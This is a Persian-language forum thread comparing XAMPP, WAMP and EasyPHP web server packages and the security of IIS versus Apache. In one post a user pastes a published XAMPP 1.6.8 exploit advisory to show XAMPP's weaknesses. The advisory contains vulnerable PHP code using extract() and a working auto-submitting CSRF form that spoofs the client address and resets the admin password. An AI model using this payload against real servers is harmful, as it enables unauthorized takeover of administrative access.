صفحه 2 از 2 اولیناولین 1 2
نمایش نتایج: از شماره 16 تا 19 از مجموع 19

موضوع: تفاوت وب سرويس Xamp و Wamp و easyPHP

  
  1. #16

  2. #17
    نام حقيقي: Shikamaru

    عضو عادی شناسه تصویری aBTEEN
    تاریخ عضویت
    May 2010
    محل سکونت
    تهران
    نوشته
    79
    سپاسگزاری شده
    32
    سپاسگزاری کرده
    10
    نقل قول نوشته اصلی توسط Gitex نمایش پست ها
    درسته كه بصورت پكيج هستند ... اما ريزه كاري هايي هست كه وقتي به صورت مجزا (مثل MySql ) نصب ميشه تفاوت زيادي با پكيج داره.
    در بسياري از موارد مشكلات پرميشن باعث ميشه سايت شما در 4 كليك ساده هك بشه.

    تعدادي از فولدر ها هستند كه بايد تغييراتي در آنها داده بشه.

    پس شما چطور امنيت IIS رو با xampp يا wamp يا easyphp و ... مقايسه ميكنيد ؟

    اما بنده عرض كردم بهترين گزينه بين اين 3 تا wamp هست.
    منظورتون از ریزه کاری فکر کنم تنظیمات باشه.
    در مورد مشکلات پرمیشن شما با تغییرات در فایل httpd.conf در Apache میتوانید به هدف خود برسید.
    در مورد مقایسه امنیت بهتر بود IIS را با Apache مقایسه میکردید تا با Xamp , Wamp و .....
    که در بسیاری از موارد امن تر بودن Apache باعث محبوبیت آن شد.



  3. #18
    نام حقيقي: احمد

    عضو عادی شناسه تصویری Gitex
    تاریخ عضویت
    Dec 2007
    محل سکونت
    -
    نوشته
    550
    سپاسگزاری شده
    329
    سپاسگزاری کرده
    122
    ميتونم بپرسم httpd.conf چه ارتباطي به پرميشن و بستن دسترسي داره ؟ !!!

    ببخشيد ... شايد سواد من نميرسه ولي بنده براي deny كردن از htaccess استفاده ميكنم و هيچ ارتباطي با httpd.conf در اين مورد پيدا نميكنم.

    بهتر بود شما بحث رو از اول پيگيري كنيد تا بهتر متوجه سوال و جوابها بشيد.

    دوستمون در محيط ويندوز ميخواد كار كنه ... خوب ... شما چطوري ميخوايد براي ايشون يه وب سرور امن ايجاد كنيد ؟ ايشون ميخواد آنلاين باشه ... امن تر از IIS در ويندوز كه Mysql و php و احيانا براي سهولت phpmyadmin هم داشته باشه شما سراغ داريد (براي استفاده آنلاين) ؟


    نمونه اي از مشكلات xampp كه البته خيلي مبتدي هست.

    البته اگر مايل بوديد ميتونيد لينك آپ بديد ... داون تحويل بگيريد.


    کد:
    XAMPP change administrative password:
    --------------------------------------------------------------------------------
    Written by Michael Brooks
    special thanks to str0ke
    
    Affects XAMPP 1.6.8.
    homepage: http://www.apachefriends.org/
    XAMPP has 17+ million downloads from sourceforge.net.
    register_globals=On or Off
    This attack is exploitable even when this page is reporting a fully
    secure system: http://10.1.1.10/security/index.php
    
    There are two vulnerabilities that are being used toagther.
    1)Global variable manipulation to spoof ip address.
    2)XSRF to change the .htaccess password for http://10.1.1.10/security/
     and http://10.1.1.10/xampp/ .
    
    The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
    this cannot normally be spoofed.
    However extract($_POST); can be used to overwrite any declared
    variable,  including the $_SERVER superglobal.  This can be used to
    "spoof"  your ip address as 127.0.0.1
    This xsrf attack can be exploited from a browser in any ip address, so
    long as that browser is currently authenticated.
    
    This vulnerable code is from the very top of: /security/xamppsecurity.php
    <?php
           error_reporting(0);
           extract($_POST);
           extract($_SERVER);
           $host = "127.0.0.1";
           $timeout = "1";
    
           if ($REMOTE_ADDR) {
                   if ($REMOTE_ADDR != $host) {
                           echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                           exit;
                   }
           }
    //...
    
    //Start of xsrf attack
    <html>
        <form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
                  <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
            <input type=hidden name="xamppuser" value=admin >
            <input type=hidden name="xampppasswd" value=password>
            <input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
            <input type=submit>
        </form>
    </html>
    <script>
        document.getElementById(1).submit();
    </script>//End of xsrf attack




  4. #19
    نام حقيقي: احمد

    عضو عادی شناسه تصویری Gitex
    تاریخ عضویت
    Dec 2007
    محل سکونت
    -
    نوشته
    550
    سپاسگزاری شده
    329
    سپاسگزاری کرده
    122
    نقل قول نوشته اصلی توسط essivision نمایش پست ها
    با IIS 6 هم جواب ميده؟
    البته دوست عزيز. مشكلي در اين مورد نيست.



صفحه 2 از 2 اولیناولین 1 2

کلمات کلیدی در جستجوها:

تفاوت xampp و wamp

wamp یا xampp

تفاوت xampp با wamp

فرق xampp با wamp

easyphp چیست

xampp یا wamp

wamp چیست

xampچیست

تفاوت wamp و xampp

easy php چیستwamp یا xampxampچیست؟تفاوت wamp با xampwamp بهتر است یا xamppxampp بهتر است یا wampتفاوت wamp و xampتفاوت xamp و wampفرق xampp و wampwamp بهتر است یا easy phpwampچیستwamp یا xammpنرم افزار xampp wamp چیستyhs-1easy php چیست؟wamp چیست؟

برچسب برای این موضوع

مجوز های ارسال و ویرایش

  • شما نمی توانید موضوع جدید ارسال کنید
  • شما نمی توانید به پست ها پاسخ دهید
  • شما نمی توانید فایل پیوست ضمیمه کنید
  • شما نمی توانید پست های خود را ویرایش کنید
  •